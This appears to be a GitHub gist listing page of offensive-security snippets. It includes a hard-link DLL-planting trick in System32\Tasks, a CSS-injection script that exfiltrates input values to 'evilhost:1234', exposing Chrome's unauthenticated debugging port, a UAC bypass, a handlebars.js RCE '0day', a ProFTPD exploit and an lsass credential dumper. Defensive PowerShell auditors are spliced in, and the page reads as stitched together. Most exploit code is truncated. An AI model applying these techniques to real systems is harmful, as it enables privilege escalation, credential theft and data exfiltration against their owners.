Nick deltaclock

@deltaclock
deltaclock / Get-InjectedThread.ps1
Created February 13, 2020 16:01 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@deltaclock
deltaclock / Seatbelt.boo
Created February 5, 2020 16:28 — forked from byt3bl33d3r/Seatbelt.boo
A Boolang port of GhostPack's Seatbelt (https://github.com/GhostPack/Seatbelt)
/*
This is a complete port of @Harmjoy's Seatbelt tool to Boolang
All credit goes to him for writing this beast
https://github.com/GhostPack/Seatbelt
*/
@deltaclock
deltaclock / Update_Notes.md
Created January 13, 2020 14:12
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing the writable System32\Tasks and SysWOW64\Tasks directories

Using a hard link to point the expected file name back to an attacker-controlled location:

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

The name under Tasks now resolves to the attacker's file, so a DLL search that reaches that directory loads the contents of C:\Tools\Tasks.dll, while tools that watch for file modifications in the Tasks folder see nothing written there: the hard link shares the existing file's data, so every write goes to C:\Tools\Tasks.dll. Two caveats for anyone trying this: a hard link must live on the same NTFS volume as its target, and current Windows 10 builds only allow a hard link when the caller has write access to the target file. That second restriction killed the classic hard-link privilege escalations but does not matter here, because the attacker already owns C:\Tools\Tasks.dll.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
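A defender's counterpart to the trick above, written for this page as an added example (it is not part of the gist): audit both Tasks directories for files that have more than one hard link, or that are binaries where only task XML should live, and report where the extra links point. The directory list and the extension list are assumptions; `fsutil hardlink list` prints every path sharing the file's MFT record, so more than one line means a link exists elsewhere on the volume.

```powershell
# Added example, not from the gist. Run from an elevated Windows PowerShell prompt:
# listing C:\Windows\System32\Tasks and running fsutil both need administrator rights.
function Get-SuspiciousTaskFile {
    param(
        # Assumed locations of the scheduler's task store (the directories the gist abuses).
        [string[]]$Path = @("$env:SystemRoot\System32\Tasks", "$env:SystemRoot\SysWOW64\Tasks"),
        # Assumed set of extensions that have no business in a task store.
        [string]$BinaryPattern = '^\.(dll|exe|ocx|cpl)$'
    )
    foreach ($dir in $Path) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # fsutil prints volume-relative paths, e.g. \Windows\System32\Tasks\tasks.dll,
            # one per hard link, including the path we asked about.
            $links = @(& fsutil.exe hardlink list $file.FullName 2>$null | Where-Object { $_ })
            $otherLinks = @($links | Where-Object {
                -not $file.FullName.EndsWith($_, [System.StringComparison]::OrdinalIgnoreCase)
            })
            $isBinary = $file.Extension -match $BinaryPattern
            if ($otherLinks.Count -gt 0 -or $isBinary) {
                [pscustomobject]@{
                    Path       = $file.FullName
                    LinkCount  = $links.Count
                    OtherLinks = ($otherLinks -join '; ')
                    Reason     = if ($otherLinks.Count -gt 0) { 'hard link to a file outside the folder' }
                                 else { 'executable image in the task store' }
                }
            }
        }
    }
}

Get-SuspiciousTaskFile | Format-Table -AutoSize
```

A tasks.dll planted as in the gist shows up with LinkCount 2 and OtherLinks naming \Tools\Tasks.dll; a genuinely dropped DLL shows up on the extension check alone. Deleting the link under Tasks removes only that directory entry, so the attacker's copy in C:\Tools is still there to collect.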

import time
import requests
host = 'evilhost:1234'
start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}'
triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}'
timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}'
frames = '''button{animation:l1 35s;}
@deltaclock
deltaclock / cache_review.go
Created December 22, 2019 12:56 — forked from patryk4815/cache_review.go
Solver for the task Cache Review at justCTF 2019
package main
import (
"crypto/rand"
"crypto/sha1"
"encoding/base64"
"errors"
"flag"
"fmt"
"io"
@deltaclock
deltaclock / Instructions.md
Created November 7, 2019 15:50
Headless Remote Chrome Debugging - Ichabod Chrome :)

Target

Start Chrome with the following flags (--remote-debugging-address binds the DevTools listener to every interface; without it Chrome only listens on 127.0.0.1):

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-debugging-address=0.0.0.0

The DevTools protocol performs no authentication, so anyone who can reach TCP 9222 can list the open targets at http://<target>:9222/json and drive the browser over the advertised WebSocket URL, which includes reading cookies and page content from whatever session is logged in.
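To spot a browser left in that state, here is an added example (not part of the gist) that inspects a Chrome or Edge command line for the two flags and decides whether the DevTools endpoint is reachable beyond localhost. The sample command lines are constructed for the demonstration, and the process-name filter for the live check is an assumption.

```powershell
# Added example, not from the gist. Evaluates one browser command line and
# reports the DevTools port, bind address and whether it is exposed off-host.
function Test-RemoteDebugExposure {
    param([Parameter(Mandatory)][string]$CommandLine)

    if ($CommandLine -notmatch '--remote-debugging-port=(\d+)') { return $null }
    $port = [int]$Matches[1]

    # Chrome binds the listener to loopback unless --remote-debugging-address says otherwise.
    $address = if ($CommandLine -match '--remote-debugging-address=(\S+)') { $Matches[1] } else { '127.0.0.1' }

    [pscustomobject]@{
        Port     = $port
        Address  = $address
        Exposed  = $address -notin @('127.0.0.1', 'localhost', '::1')
        Endpoint = "http://${address}:${port}/json"
    }
}

# Live check on a Windows host: walks every running Chrome/Edge process (assumed names).
function Get-RemoteDebugExposure {
    Get-CimInstance Win32_Process -Filter "Name='chrome.exe' OR Name='msedge.exe'" |
        ForEach-Object { Test-RemoteDebugExposure -CommandLine $_.CommandLine } |
        Where-Object { $_ }
}

# Constructed sample command lines, not captured from a real host.
$samples = @(
    '"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-debugging-address=0.0.0.0',
    '"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9222',
    '"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --profile-directory=Default'
)
$samples | ForEach-Object { Test-RemoteDebugExposure -CommandLine $_ } | Format-Table -AutoSize
```

The first sample is the configuration from the instructions above and reports Exposed = True; the second is the common local automation setup and reports False because Chrome defaults to 127.0.0.1; the third has no debugging port and is skipped. On a real host, pair the Exposed result with a listener check on the reported port, since a process restarted without the flag may still show in stale shell history.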

@deltaclock
deltaclock / akagi_58a.c
Created October 24, 2019 12:31 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@deltaclock
deltaclock / 0day.handlebars
Created September 20, 2019 10:51 — forked from itszn/0day.handlebars
handlebars.js rce 0day
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}
#!/usr/bin/env python3
############################
# Tested on ProFTPD 1.3.3a #
############################
import sys
import socket
import struct
class Data:
@deltaclock
deltaclock / autoProc.py
Created August 24, 2019 14:29 — forked from knavesec/autoProc.py
Automatic lsass dumper
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages